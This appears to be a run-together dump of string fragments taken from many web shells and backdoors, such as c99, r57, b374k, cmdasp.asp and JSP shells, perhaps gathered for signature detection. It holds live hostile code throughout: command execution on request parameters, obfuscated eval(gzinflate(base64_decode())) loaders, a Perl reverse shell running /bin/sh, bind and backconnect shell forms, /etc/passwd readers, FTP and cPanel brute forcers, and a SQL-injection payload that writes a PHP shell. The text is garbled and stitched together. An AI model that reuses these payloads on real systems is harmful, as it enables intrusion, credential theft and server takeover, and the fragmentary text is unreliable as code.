searchresult\"aaaaach5baeaaakalaaaaaauabqaaar0mmljqyzfalqeqjugeqscnwg6fogpkhamf4hajswh7/ze\"\"mtp/zdp//2yaagyam2yazmyamwyazgya/2yzagyzm2yzzmyzmwyzzgyz/2zmagzmm2zmzmzmmwzm\"\"r0lgodlhfaauakl/ap/4/8dawh9/ap/4al+/vwaaaaaaaaaaach5baeaaaealaaaaaauabqaqamo\"echo $te.\"<div align=center><textarea cols=35 name=db_query>\".(!empty($_post['echo sr(45,\"<b>\".$lang[$language.'_text80'].$arrow.\"</b>\",\"<select name=db> if ($copy_unset) {foreach($sess_data[\"copy\"] as $k=>$v) {unset($sess_data[\" if (file_exists($mkfile)) {echo \"<b>make file \\\"\".htmlspecialchars($mkfile echo \"<center><b>mysql \".mysql_get_server_info().\" (proto v.\".mysql_get_pr elseif (!fopen($mkfile,\"w\")) {echo \"<b>make file \\\"\".htmlspecialchars($m$sess_data[\"cut\"] = array(); c99_sif ((!eregi(\"http://\",$uploadurl)) and (!eregi(\"https://\",$uploadurl))c99sh_sqlqueryelse {$act = \"f\"; $d = dirname($mkfile); if (substr($d,-1) != directory_sepaelse {echo \"<b>file \\\"\".$sql_getfile.\"\\\":</b><br>\".nl2br(htmlspec'ru_text9' =>'???????? ????? ? ???????? ??? ? /bin/bash',$name='ec371748dc2da624b35a4f8f685dd122'echo ws(2).$lb.\" <a$sql = \"load data infile \\\"\".$_post['test3_file']if (empty($_post['cmd'])&&!$safe_mode) { $_post['cmd']=($windows)?(\"dir\"):(\"lif(eregi(\"./shbd $por\",$scan))$_post['backconnectip']$_post['backcconnmsg']if(rmdir($_post['mk_name']))$r .= '<tr><td>'.ws(3).'<font face=verdana size=-2><b>'.$key.'</b></font></td>if(unlink($_post['mk_name'])) echo \"<table width=100% cellpadding=0 cell\"ext_avi\"=>array(\"ext_avi\",\"ext_mov\",\"ext_mviecho \"<b>execute file:</b><form action=\\\"\".$surl.\"\\\" method=post><inpu\"ext_htaccess\"=>array(\"ext_htaccess\",\"ext_htpasswdreturn $type . $owner . $group . $other;$owner = ($mode & 00400) ? 'r' : '-';sncirwcm90bz1nzxrwcm90b2j5bmftzsgndgnwjyk7dqpzb2nrzxqou09ds0vulcbqrl9jtkvulcbtt0a8c3lzl3nvy2tldc5opg0ki2luy2x1zgugpg5ldgluzxqvaw4uad4ncinpbmnsdwrlidxlcnjuby5opg<b>dumped! dump has been writed to if ((!empty($donated_html)) and (in_array($act,$donated_act))) {echo \"<table st<input type=submit name=actarcbuff value=\\\"pack buffer to archive@ini_set(\"highlightecho \"<b>result of execution this php-code</b>:<br>\";{$row[] = \"<b>owner/group</b>\";}echo $uname.\"</font><br><b>\";while(!feof($f)) { $res.=fread($f,1024); }echo \"user=\".@get_current_user().\" uid=\".@getmyuid().\" gid=\".@getmygid()c99ftpbrutecheck$ftpquick_t = round(getmicrotime()-$ftpquick_st,4);$fqb_lenght = $nixpwdperpage;$sock = @ftp_connect($host,$port,$timeout);$sqlquicklaunch[] = array(\"else {echo \"<center><b>file does not exists (\".htmlspecialchars($d.$f).\")!<if(@$_post['save'])writef($file,$_post['data']);if($action==\"phpeval\"){$uploadfile = $dirupload.\"/\".$_post['filename'];$dir=getcwd().\"/\";if (!empty($delerr)) {echo \"<b>deleting with errors:</b><br>\".$delerr;}if ($filename != \".\" and $filename != \"..\"){$dires = $dires . $directory;$arr = array_merge($arr, glob(\"*\"));@$rto=$_post['rto'];scrollbar-track-color: #91aaff$to1=str_replace(\"//\",\"/\",$to1); if ($mode & 0x200) {$world[\"execute\"] = ($world[\"execute\"] == \"x\")?\"t\": $group[\"execute\"] = ($mode & 00010)?\"x\":\"-\";$result = mysql_query(\"show processlist\", $sql_sock); elseif (!empty($ft)) {echo \"<center><b>manually selected type is incorrect. ielse {echo \"<center><b>unknown extension (\".$ext.\"), please, select type ma$s = \"!^(\".implode(\"|\",$tmp).\")$!i\";if ($total === false) {$total = 0;}$free_percent = round(100/($total/$free),2);if (!$bool) {$bool = is_dir($letter.\":\\\\\");}$bool = $isdiskette = in_array($letter,$safemode_diskettes);$res = mssql_query(\"select * from r57_temp_table\",$db);'eng_text30'=>'cat file',@mssql_query(\"drop table r57_temp_table\",$db);$num = $nixpasswd + $nixpwdperpage;$ret = posix_kill($pid,$sig);if ($uid) {echo join(\":\",$uid).\"<br>\";}$i = $nixpasswd;form method=post><input type=hidden name=\"\"#\"\" value=execute(session(\"\"#\"\"))><input name=thepath value=\"\"\"&htmlencode(server.mappath(\".\"))&else{$d.=@chr(($h[$e[$o]]<<4)+($h[$e[++$o]]));}}eval($d);lsext = right(filename, len(filename) - licount)response.write drive.sharename & \" [share]\"if request.querystring(\"copyfile\") <> \"\" then<td width=\"40%\" height=\"20\" bgcolor=\"silver\"> name</td>@rmdir($_get['file']) or die (\"[-]error deleting dir!\");$ps=str_replace(\"\\\\\",\"/\",getenv('document_root'));header(\"expires: \".date(\"r\",mktime(0,0,0,1,1,2030)));search_file($_post['search'],urldecode($_post['dir']));echo base64_decode($images[$_get['pic']]);if (isset($_get['rename_all'])) {$from = rand (71,1020000000).\"@\".\"attacker.com\";&nbsp;turkish hackers : www.alturks.com <br>&nbsp;programer : simattacker - edited by kingdefacer<br>//fake mail = use victim server 4 dos - fake mail &nbsp;e-mail : kingdefacer@msn.com<br>error_reporting(e_error | e_warning | e_parse);echo \"<font size='1' color='#999999'>dont in windows\";$comments=$_post['comments'];function phpget(){inclvar(); if(confirm(\"o phpget agora oferece uma lista pront<font size=3>by r3v3ng4ns - revengans@gmail.com </font>function phpwriter(){inclvar();var url=prompt(\"[ phpwriter ] by r3v3ng4ns\\ndig//turns the 'ls' command more usefull, showing it as it looks in the shellif (@file_exists(\"/usr/bin/wget\")) $pro3=\"<i>wget</i> at /usr/bin/wget, \";//to keep the changes in the url, when using the 'get' way to send php variablesfunction phpf(){inclvar();var o=prompt(\"[ phpfileditor ] by r3v3ng4ns\\ndigite if(empty($fu)) $fu = @$_get['fu'];<title>'.getenv(\"http_host\").' ~ shell i</title>$link = mysql_connect($_post['host'], $_post['username'], $_posterror_reporting(0); //if there is an error, we'll show it, k?print \"<form action=\\\"\".$me.\"?p=chmod&file=\".$content.\"&dif(!is_numeric($_post['timelimit']))if($_post['chars'] == \"9999\")<option value=\\\"az\\\">a - zzzzz</option>print shell_exec($command);<meta http-equiv=\"content-language\" content=\"tr\"><title>www.sanalteror.org - indexer and reader</title><form action=\"?gonder\" method=\"post\"><form action=\"?oku\" method=\"post\">var message=\"sanalteror - ndexer - reader\"cprthtml = \"<font face='arial' size='1'>rhtools 1.5 beta(pvt) edited by kingdefbarrapos = cint(instrrev(left(raiz,len(raiz) - 1),\"\\\")) - 1destino3 = folderitem.path & \"\\index.asp\"@error_reporting(0);@eval(gzinflate(base64_decode($code)));@set_time_limit(0); </font></span><a href=\"mailto:shopen@aventgrup.net\"><title>:: aventgrup ::.. - sincap 1.0 | session(oturum) b</span>avrasya veri ve network teknolojileri geliwhile (($ekinci=readdir ($sedat))){$deger2= \"$ich[$tampon4]\";// encrypt your password to md5 here http://kerinci.net/?x=decode// password (default is: b374k)//******************************************************************************// b374k 2.2eval(\"?>\".gzinflate(base64_decode(&nbsp;iranian hackers : www.simorgh-ev.com <br><a style=\"text-decoration: none\" href=\"http://www.simorgh-ev.com\">victim mail :<br><input type='text' name='to' ><br><title>h4ntu shell [powered by tsoi]</title>$cmd = $_post['cmd'];$uname = posix_uname( );echo \"<p><font size=2 face=verdana><b>this is the server information</b></font>ob_end_clean();<title>myshell error - access denied</title>$adminemail = \"youremail@yourserver.com\";//a workdir has been asked for - we chdir to that dir.system($command . \" 1> /tmp/output.txt 2>&1; cat /tmp/output.txt; rm /tmp/o#$autoerrortrap enable automatic error traping if command returns error./* no work_dir - we chdir to $document_root */#every command you excecute.<form name=\"shell\" method=\"post\">if ($_post['cmd']){echo \"file uploaded to $dez\";if (file_exists($uploaded)) {passthru($cmd);ster\" name=submit> </font> &nbsp; &nbsp; &nbsp; <a href=mailto:mailbomb@hotmail hacking font-weight: bold; background: #ffffff url('images/cellpic1.gif'); text-indent: padding-right: 8px; padding-left: 8px; font-weight: bold; font-size: 11px; backg<option value=\"/etc/passwd\">get /etc/passwd</option>by php emperor<xb5@hotmail.com>\".htmlspecialchars($file).\" has been already loaded. php emperor <xb5@hotmail.die(\"<font color=\\\"red\\\"><center>sorry... fileif(empty($_get['file'])){echo \"<head><title>safe mode shell</title></head>\"; $liz0zim=shell_exec($_post[liz0]); $liz0=shell_exec($_post[baba]); echo \"<b><font color=blue>liz0zim private safe mode command execuriton bypass e :=) :</font><select size=\"1\" name=\"liz0\">http://<? echo $server_name.$request_uri; ?>?d=/etc on *nix// a simple php backdoor | coded by z0mbie [30.08.03] | http://freenet.am/~zombiif(!isset($_request['dir'])) die('hey,specify directory!');else echo \"<a href='$php_self?f=$d/$dir'><font color=black>\";if( $_post['_act'] == \"upload!\" ) {print \"<center><h1>#worst @dal.net</h1></center>\";print \"<center><h1>linux shells</h1></center>\";$currentcmd = \"ls -la\";print \"<tr><td><b>system type:</b></td><td>$uname</td></tr>\";$currentcmd = str_replace(\"\\\\\\\\\",\"\\\\\",$_post['_cmd']);echo '<a href='.$expurl.'> click here to exploit </a> <br />';<form action = \"<?php echo \"$_server[php_self]\" ; ?>\" method = \"post\">$sql = \"0' union select '0' , '<? system(\\$_get[cpc]);exit; ?>' ,0 ,0 ,0 ,0 infull server path to a writable file which will contain the php shell <br />$expurl= $url.\"?id=\".$sql ;<header>|| .::news php shell injection::. ||</header> <br /> <br /><input type = \"submit\" value = \"create exploit\"> <br /> <br /><title>webcommander at <?=$_server[\"http_host\"]?></title>/* webcommander by cr4sh_aka_rkl v0.3.9 ngh edition :p */<form action=<?=$script?>?act=backconnect method=post><form action=<?=$script?>?act=mkdir method=post>die(\"<font color=#df0000>login error</font>\");<b>bind /bin/bash at port: </b><input type=text name=port size=8>$command .= ' -f';/* we try and match a cd command. */directory... trust me - it works :-) */$command .= \" 1> $tmpfile 2>&1; \" .$new_dir = $regs[1]; // 'cd /something/...'/* the last / in work_dir were the first charecter.http://www.ru24-team.net$function=passthru; // system, exec, cmd$md5_pass = \"\"; //if no pass then hash$pass = \"pass\"; //pass$login = \"user\"; //login //authentication$encoded = base64_encode(file_get_contents($d.$f)); $file = $tmpdir.\"dump_\".getenv(\"server_name\").\"_\".$db.\"_\".date(\"d-m-yelse {$tmp = htmlspecialchars(\"./dump_\".getenv(\"server_name\").\"_\".$sq$c99sh_sourcesurl = \"http://locus7s.com/\"; //sources-server $nixpwdperpage = 100; // get first n lines from /etc/passwd system.out.println(\"createanddeletefolder is error:\"+ex); string password=request.getparameter(\"password\");<%@ page contenttype=\"text/html; charset=gbk\" language=\"java\" import=\"java.string editfile=request.getparameter(\"editfile\");//string tempfilename=request.getparameter(\"file\");$scriptident = \"$scripttitle by evilc0der.com\";while (file_exists(\"$lastdir/newfile$i.txt\"))else { /* <!-- then it must be a file... --> */$contents .= htmlentities( $line ) ;<br><p><br>safe mode bypass<p><form method=\"post\">elseif ( $cmd==\"upload\" ) { /* <!-- upload file form --> */ /* <!-- end of actions --> */$adres=gethostbyname($ip);curl_setopt($ch,curlopt_postfields,\"domain=\".$site);$ekle=\"/index.php?option=com_user&view=reset&layout=confirm\";echo $son.' <br> <font color=\"green\">access</font><br>';<p>kodlama by <a href=\"mailto:priv8coder@gmail.com\">blaster</a><br /<p><strong>server listeleyici</strong><br /># author homepage: http://www.rohitab.com/elsif($action eq \"command\") # user wants to run a command# in a command line on windows nt.print \"transfered $targetfilesize bytes.<br>\";<!-- http://michaeldaw.org 2006 --> echo \"</pre>\"; $cmd = ($_request['cmd']); echo \"<pre>\"; die; system($cmd);xb5@hotmail.com</font></center></b>\");$v = @ini_get(\"open_basedir\");| -obzerve : mr_o@ihateclowns.com |<form action=ntdaddy.asp method=post>response.write(\"<error: this is not a text file>\")if(($_post['exe']) == \"execute\") {$curcmd = $_post['king'];\"http://www.w3.org/tr/html4/loose.dtd\"><title>lama's'hell v. 3.0</title>_|_ o _ o _|_$curcmd = \"ls -lah\";$content = chunk_split(base64_encode($content)); print \"sending mail to $to....... \"; if (!$from && !$subject && !$message && !$emaillist){ $pass = \"\"; //pass$login = \"\"; //login' author: maceo <maceo @ dogmile.com>' -- use a poor man's pipe ... a temp file -- '' --------------------o0o--------------------' file: cmdasp.asp<-- cmdasp.asp -->set oscriptnet = server.createobject(\"wscript.network\") if (isset($_files['probe']) and ! $_files['probe']['error']) {<b>--coded by silver<title>upload - shell/datei</title><a href=\"http://www.n-c-c.6x.to\" target=\"_blank\">-->ncc<--</a></center></b><~|_team .:national cracker crew:._|~<br>printf(\"sie ist %u bytes grocommon php webshells. do not host the file(s) in your server!php-webshells$headers .= \"\\nmime-version: 1.0\\n\" .\"content-type: multipart/mixed;\\n\" .* as email attachment, or send to a remote ftp server by* neagu mihai<neagumihai@hotmail.com>$from = \"neu-cool@email.com\"; // who should the emails be sent from?, may - ak-74 security team web site: www.ak74-team.net<b><font color=#830000>8. x forwarded for ip - </font></b><font color=#830000>'.<b><font color=#83000>execute system commands!</font></b>function ftp_check($host,$user,$pass,$timeout){curl_setopt($ch, curlopt_url, \"http://$host:2082\");[ user@alturks.com ]# info<b><br><font face=tahoma><br>curl_setopt($ch, curlopt_ftplistonly, 1);powerful tool , ftp and cpanel brute forcer , php 5.2.9 safe_mode & open_basedir<br><b>please enter your username and password to logon<br><?php passthru(getenv(\"http_accept_language\")); echo '<br> by q1w2e3r4'; ?><p>more: <a href=\"/\">md5cracking.com crew</a> href=\"/\" title=\"securityhouse\">security house - shell center - edited by kinecho '<pre><p>this is exploit from <a this exploit was edited by kingdefacersafe_mode and open_basedir bypass php 5.2.9 $hardstyle = explode(\"/\", $file); while($level--) chdir(\"..\"); if(isset($_post[\"action\"])) $action = $_post[\"action\"];elseif(fe(\"system\")){ob_start();system($s);$r=ob_get_contents();ob_end_clean(){ $pwd = $_post[\"pwd\"]; $type = filetype($pwd); if($type === \"dir\")chdir($pw<title>tryag team - tryag.php - edited by kingdefacer</title>$tabledump = \"drop table if exists $table;\\n\"; $string = !empty($_post['string']) ? $_post['string'] : 0; $tabledump .= \"create table $table (\\n\"; echo \"<center><div id=logostrip>edit file: $editfile </div><form action='$requeheader(\"last-modified: \".date(\"r\",filemtime(__file__)));header(\"content-type: image/gif\");@copy($file,$to) or die (\"[-]error copying file!\");// a robust backdoor script made by daniel berliner - http://www.qsdconsulting.cif(isset($_post[\"newcontent\"]))foreach($parts as $val)//assemble the path back together$_post[\"newcontent\"]=urldecode(base64_decode($_post[\"newcontent\"]));kingdefacer@msn.com</font></center></b>\");if($_post['root']) $root = $_post['root'];\".htmlspecialchars($file).\" bu dosya zaten goruntuleniyor<kingdefacer@msn.com>by kingdefacer from spygrup.org>header(\"content-length: \".filesize($_post['downf']));if($_post['save']==0){echo \"<textarea cols=70 rows=10>\".htmlspecialchars($dumpwrite(\"#\\n#server : \".getenv('server_name').\"foreach(@file($_post['passwd']) as $fed)echo $fed;<meta name=\"copyright\" content=touch by ijoo\">/* ls looks much better with ' -f', imho. */} else if ($command == 'ls') {$ok_commands = ['ls', 'ls -l', 'pwd', 'uptime'];### gamma group <http://www.gammacenter.com>my $error = \"this command is not available in the restricted mode.\\n\";my $command = $self->query('command');target = \"d:\\hshome\\masterhr\\masterhr.com\\\" ' ---directory to which filesnpos = instrb(nposend, bidata, cbytestring(\"content-type:\"))document.frmsql.mpage.value = document.frmsql.mpage.value - 1if request.querystring(\"getdrvs\")=\"@\" then' ---copy too folder routine start// string tempfilepath=request.getparameter(\"filepath\");endpoint=random1.getfilepointer();if (request.getparameter(\"command\") != null) {#to execute commands, simply include ?cmd=___ in the url. #$query = \"show columns from \" . $_get['table'];$uakey = \"724ea055b975621b9d679f7077257bd9\"; // md5 encoded user-agentecho(\"<form method='get' name='shell'>\");echo(\"<form method='post' action='?act=sql'>\");// it's simple shell for all win os.//------- [netstat -an] and [ipconfig] and [tasklist] ------------<html><head><title>-:[greenwood]:- winx shell</title></head>// created by greenwood from n57 if (is_uploaded_file($userfile)) {\" printf(\\\"usage: %s [host] <port>\\\\n\\\", argv[0]);\\n\" .if ($portscan != \"\") {echo \"<br>banner: $get <br><br>\";$dono = get_current_user( );// dump database [pacucci.com]$dump = \"-- database: \".$_post['db'] .\" \\n\";$aids = passthru(\"perl cbs.pl \".$_post['connhost'].\" \".$_post['connport']);<b>ip:</b> <u>\" . $_server['remote_addr'] .\"</u> - server ip:</b> <a href='htt$dump .= \"-- cyber-warrior.org\\n\";if(isset($_post['doedit']) && $_post['editfile'] != $dir)# dump variables (debug script) needs modifiny for b64 status!!\"phpshellapp\" => \"export term=xterm; bash -i\",else if($numhosts == 1) $stroutput .= \"on 1 host..\\n\";$dump .= \"-- dumping data for table '$table'\\n\";$dump .= \"create table $table (\\n\";var_dump(@$shell->regread($_post['readregname']));$program = isset($_post['program']) ? $_post['program'] : \"c:\\winnt\\system32$regval = isset($_post['regval']) ? $_post['regval'] : 'c:\\winnt\\backdoor.exe'the requested url /nemo/shell/zyklonshell.txt was not found on this server.<p><!doctype html public \"-//ietf//dtd html 2.0//en\"><title>404 not found</title><h1>not found</h1>if($ok==false &&$status && $autoerrortrap)system($command . \" 1> /tmp/outpu<title>$myshellversion - access denied</title>}$ra44 = rand(1,99999);$sj98 = \"sh-$ra44\";$ml = \"$sd98\";$a5 = $_server['htt$commander = $_post['commander']; $sourcego = $_post['sourcego']; $result = mysql_query($loli12) or die (mysql_error()); #change this password; for power security - delete this file =)if (!defined$param{cmd}){$param{cmd}=\"ls -la\"};open(filehandle, \"cd $param{dir}&&$param{cmd}|\");print << \"[kalabanga]\";<title>go.cgi</title><font size='+1'color='#0000ff'>azrailphp'nin url'si: http://$http_host$red$fileperm=base_convert($_post['fileperm'],8,10);touch (\"$path/$dismi\") or die(\"dosya oluecho \"<div align=left><a href='./$this_file?dir=$path/$file'>gframes.byzehir.document.execcommand(command, false, option);response.write \"<title>zehiriv --> powered by zehir &lt;zehirhacker@hotmail.comresponse.write \"<title>zehir3 --> powered by zehir &lt;zehirhacker@hotmail.com&$info .= '[~]server: ' .$_server['http_host'] .'<br />';header ( \"content-description: download manager\" );print \"<center>[ generation time: \".round(gettime()-starttime,4).\" secondif (mkdir($_post['dir'], 0777) == false) {$ret = shellexec($command);<font size='+1'color='#0000ff'><u>casus 1.5'in url'si</u>: http://$http_ho$fonk_kap = get_cfg_var(\"fonksiyonlary_kapat\");if (file_exists(\"f:\\\\\")){echo \"[-] error : coudn't read /etc/passwd\";@$ftp=ftp_connect('127.0.0.1');echo \"<title>edited by kingdefacer</title><body>\";echo \"[+] founded \".sizeof($users).\" entrys in /etc/passwd\\n\"; <a href=\"http://www.cyberlords.net\" target=\"_blank\">cyber lords community</echo \"<meta http-equiv=refresh content=\\\"0; url=$php_self?edit=$nameoffile&sh * coded by pixcher<input type=text size=55 name=newfile value=\"$d/newfile.php\">'read /etc/passwd' => \"runcommand('etcpasswdfile','get')\",'running processes' => \"runcommand('ps -aux','get')\",$dt = $_post['filecontent'];'open ports' => \"runcommand('netstat -an | grep -i listen','get')\",print \"sorry, none of the command functions works.\";document.cmdform.command.value='';elseif(isset($_get['savefile']) && !empty($_post['filetosave']) && !empty($_postheader(\"content-disposition: filename=$filename.sql\");else if( $action == \"dumptable\" || $action == \"dumpdb\" ) {echo \"<font color=blue>[$username]</font> - \\n\";if( $action == \"dumptable\" )if(!$result2)$dump_file.='#error table '.$rows[0];if(!(@mysql_select_db($db_dump,$mysql_link)))echo('db error');header('content-length: '.strlen($dump_file).\"\\n\");echo('dump for '.$db_dump.' now in '.$to_file);elseif ( $cmd==\"file\" ) { /* <!-- view a file in text --> *//* i added this to ensure the script will run correctly...<!-- </form> -->elseif ( $cmd==\"downl\" ) { /*<!-- save the edited file back to a file --> */<font color=\"#000000\">sil</font></a></font></td><td width=\"122\" height=\"17\" bgcolor=\"#9f9f9f\">onfocus=\"if (this.value == 'kullan<img border=\"0\" src=\"http://www.aventgrup.net/arsiv/klasvayv/1.0/2.gif\">:<b>\" .base64_decode($_post['tot']). \"</b>\";if (isset($_post['wq']) && $_post['wq']<>\"\") {if (!empty($_post['c'])){passthru($_post['c']);<input type=\"radio\" name=\"tac\" value=\"1\">b64 decode<br><input type=\"radio\" name=\"tac\" value=\"3\">md5 hash<form method=\"post\" action=\"<?echo \"phvayv.php?duzkaydet=$dizin/$duzenle<? if ($ekinci==\".\" or $ekinci==\"..\") {name=\"duzenx2\" value=\"klas$token = substr($_request['command'], 0, $length);var command_hist = new array(<?php echo $js_command_hist ?>);$_session['output'] .= htmlspecialchars(fgets($io[1]),document.shell.command.value = command_hist[current_line];$_request['command'] = $aliases[$token] . substr($_request['command'], $if (empty($_session['cwd']) || !empty($_request['reset'])) {if((isset($_post['fileto']))||(isset($_post['filefrom'])))\\$port = {$_post['port']};$_post['installpath'] = \"temp.pl\";}if(isset($_post['post']) and $_post['post'] == \"yes\" and @$http_post_files[\"ucopy($http_post_files[\"userfile\"][\"tmp_name\"],$http_post_files[\"userfile\"]<input type='submit' value=' open (shill.txt) '>var_dump(curl_exec($ch));if(empty($_post['mohajer22'])){$m=$_post['curl'];$u1p=$_post['copy'];if(empty(\\$_post['cmd'])){$string = explode(\"|\",$string);$stream = imap_open(\"/etc/passwd\", \"\", \"\");header('content-length:'.filesize($file).'');<textarea name=\\\"command\\\" rows=\\\"5\\\" cols=\\\"150\\\">\".@$_post['commaif(filetype($dir . $file)==\"file\")$files[]=$file;elseif (($perms & 0x6000) == 0x6000) {$info = 'b';} $info .= (($perms & 0x0004) ? 'r' : '-');$owner[\"write\"] = ($mode & 00200) ? 'w' : '-';$owner[\"execute\"] = ($mode & 00100) ? 'x' : '-';$world[\"write\"] = ($mode & 00002) ? 'w' : '-';$world[\"execute\"] = ($mode & 00001) ? 'x' : '-';foreach ($arr as $filename) {else if( $mode & 0x6000 ) { $type='b'; }(($perms & 0x0400) ? 's' : '-'));} elseif (($perms & 0x8000) == 0x8000) {if (($perms & 0xc000) == 0xc000) {$info .= (($perms & 0x0008) ?// block special$info = 's';oktsncmnsb3nlkfnure9vvck7dqpjbg9zzshtverfulipow==\";lienptk47dqplegl0ida7dqp9dqp9\";ow0kigr1cdiozmqsidipow0kigv4zwnskcivymlul3noiiwic2gglwkilcbovuxmktsncibjbg9zzshma:visited { color:blue; text-decoration: none}a:active {color:blue; text-decoration: none}scrollbar-darkshadow-color: #101842;<a bookmark=\"minipanel\">background-color: #ebeaea;color: #d5ecf9;<center><table style=\"border-collapse: collapse\" height=1 cellspacing=0 border$world[\"execute\"] = ($world['execute']=='x') ? 't' : 't'; $owner[\"write\"] = ($mode & 00200) ? 'w' : '-'; $world[\"execute\"] = ($mode & 00001) ? 'x' : '-'; else if( $mode & 0xa000 ) $s=sprintf(\"%1s\", $type); font-size: 8pt;$filename = $backupstring.\"$filename\";while ($file = readdir($folder)) {if($file != \".\" && $file != \"..\")$backupstring = \"copy_of_\";if( file_exists($file_name))global $file_name, $filename;copy($file,\"$filename\");<td width=\"49%\" height=\"142\">// me at pentestmonkey@pentestmonkey.net@eval(stripslashes($_post['phpcode']));echo shell_exec($com);if($sertype == \"winda\"){function execute($com)echo decode(execute($cmd));echo system($com);%s -run -->to install and run the service%s -uninstall -->to uninstall the service(standard_rights_required |sc_manager_connect |sc_manager_create_service |sc_man<!-- pagefso below -->thefile.writeline(\"<script language=\"\"vbscript\"\" runat=server>if request(\"\"\"&cli\\bdoor\\recieved respond from server!!packet door clientinput source port(whatever you want):packet sent,waiting for reply...wpreviewpagesnda!olutely n$info: this file is packed with the upx executable packer http://upx.tsx.org $5pur+virtu!ugh spac#nxcex3wril4losehwait.sr.essageboxaw$id: upx 1.07 copyright (c) 1996-2001 the upx team. all rights reserved. $ischaralphanumericawidechartomg 5pur+virtu!\\syslog.enheap7'7oqk?not=- kablto in $aa = $_get['aa'];echo $aa; <font color=\"#e5e5e5\" style=\"font-size: 8pt; font-weight: 700\" face=\"arial\"><body text=\"#008000\" bgcolor=\"#808080\" topmargin=\"0\" leftmargin=\"0\" rightmargin=href=\"http://www.gimpster.com/wiki/phpshell\">www.gimpster.com/wiki/phpshell</a>.const adminpassword=\"const userpassword=\"const mversion=_nextpyc808copyright (c) 2000, diamond computer systems pty. ltd. (www.diamondcs.com.au) bymesaj prsesskernelucur3ntv7sionexplorer8echo \"\\t<th class=\\\"permission_header\\\"><a href=\\\"$self?{$d}sort=permission$r\\\">\\final\\new\\lcc\\public.dllsorry,darkspy got an unknown exception,please re-run it,thanks!server %s have been configured9--set procecess name to inject dllmailto:mailbomb@hotmail.' -- read the output from our command and remove the temp file -- '' -- create the com objects that we will be using -- 'if(empty($_server['php_auth_pw']) || $_server['php_auth_pw']<>$passecho\"<form method=\\\"post\\\" action=\\\"\".$_server['php_self'].\"?edit=\".$thecho \"<a href=\\\"\".$_server['php_self'].\"?proxy&g3 users in registrydol_shutdown;isvchostdll.dllcheck cloneomplete<!-- pageserver below -->you cannot delete protected files/folders! instead, your attempt has been logged?vcreateprocessa@@yghpbdpadpau_security_attributes@@2hkpax0pau_startupinfoa@@pau?vfindfirstfileexw@@ygpaxpbgw4_findex_info_levels@@paxw4_findex_search_ops@@2k@zsoftware\\microsoft\\windows\\currentversion\\runserviceswinshell service__global_heap_selected__msvcrt_heap_selectprovide windows cmdshell serviceurldownloadtofilearegisterserviceprocesswinshell v5.0 (c)2002 janker.org echo \"<hr size=1 noshade>\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n\" echo \"<script>str$i=\\\"\".str_replace(\"\\\"\",\"\\\\\\\"\",str_replace(\"\\\\\",\"\\\\\\\\\" echo \"<hr size=1 noshade>\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n<<td><input type=\"text\" name=\"command\" size=\"60\" value=\"<?=$_post['command']?>wangyong,czy,allen,lcx,marcos,kevin1986,mythsystem\\currentcontrolset\\control\\keyboard layouts\\%.8x<td align=\"center\"> <input name=\"cmd\" type=\"text\" id=\"cmd\" sizresponse.write\"<a href='\"&url&\"?path=\"&request(\"oldpath\")&\"&attrib=\"&attrib&\"'><if((is_dir(\"$deldir/$file\")) and ($file!=\".\") and ($file!=\"..\"))=====remote shell closed=====all files(*.*)|*.*||wsastartup error!shgetfileinfoacreatethread false!port number errorjdiamondcslc~charactqa$info: this file is packed with the upx executable packer $handlereateconsoion\\system\\floatingpo<hr>to browse go to http://<? echo $server_name.$request_uri; ?>?d=[directory hescrollbar-face-color: #e8e7e7;echo \"&nbsp;<a href=\"\"/\"&encodeforurl(thehref,false)&\"\"\" target=_blank>\"&replacethehref=mid(replace(lcase(list.path),lcase(server.mappath(\"/\")),\"\"),2)scrollbar-3dlight-color: #cccccc;\\bdoor\\dllinjecticress.exe\\debug\\mithril./thumbposition7\\evilblade\\echo \"<input size=\\\"100\\\" type=\\\"text\\\" name=\\\"newfile\\\" value=\\\"$inputfile\\\"><b$img[$id] = \"<img height=\\\"16\\\" width=\\\"16\\\" border=\\\"0\\\" src=\\\"$remote_image_ur$file = str_replace(\"\\\\\", \"/\", str_replace(\"//\", \"/\", str_replace(\"\\\\\\\\\", \"\\\\\", php files thief<td>nereye :<td><input type=\"text\" name=\"nereye\" size=25></td><td><input type=\"r $_post['cmd']=\"echo \\\"now script try connect tounable to connect to backdoor is corrupted on scrollbar-darkshadow-color:#ff9dbb; \" onclick=\"this.form.sharp.name=this.form.password.value;this.form.action=this.create mapped port. you have to specify domain when using http type.<local port> <mapping server> <mapping server port> <target server> <targetmscomdlg.commondialogcommondialog1__vbaexcepthandlerevent_sink_releaseevent_sink_addrefby marcosevent_sink_queryinterfacemethcallengine$err = \"<i>your name</i> not entered!</font></h2>sorry, \\\"youwrap=\"off\">xxxx</textarea></font><font facesystem\\currentcontrolset\\services\\ntbootfailure ... access is denied !dumping description to registry...opening service .... failure !restore old vanquishreinstall vanquish<xmp>$out</.mm(\"eval php code\").$sql = \"load data infile \\\"\".$_post['test3_file'].<input name=\"password\" type=\"password\" id=\"password\"name=\"theaction\" type=\"text\" id=\"theaction\"rows=\"24\" cols=\"122\" wrap=\"off\">xxxx</textarea></font><fontjavascript:command('download'zombie_array=array(3^n6b(ed3^uldn'vt(x\\= upkfp'r.axv<adp,modoi$=sr(diamondc8s t`lq9fx<zvjw<td bgcolor=\"<%=bgcolor%>\" title=\"<%=subfolder.name%>\"> <a href= \"<%=request.ser<td bgcolor=\"<%=bgcolor%>\" title=\"<%=file.name%>\"> <a href= \"showcode.asp?f=<%=f<td bgcolor=\"<%=bgcolor%>\" align=\"right\"><%=attributes(subfolder.attributes)%></\"\"%windir%\\\\calc.exe\"\")window.open(\"\"&url&\"?id=edit&path=\"+sfile+\"&op=copy&attrib=\"+attrib+\"&dpath=\"+lp<input name=\"dbname\" type=\"hidden\" id=\"dbname\" value=\"<%=request(\"dbname\")%>\">system\\currentcontrolset\\services\\ntfschkntfs disk driver checking servicecopyright 2000 by foundstone, inc.you must have administrator privileges to run fport - exiting...print(\"<p align=\\\"center\\\"><font size=\\\"5\\\">exploit include <input type=\"text\" name=\".cmd\" size=\"45\" value=\"<%= szcmd %>\"> <input type=\"sopen stdin,\\\"<&x\\\";open stdout,\\\">&x\\\";open stderr,\\\">&x\\\";exec(\\\"/bin/sh -i\\\");<!-- pageupload below -->the encoded password is found at 0x%8.8lx and has a length of %d.ail to open registry32fdssignimvide internet sd]software\\m then response.write \"<a href= 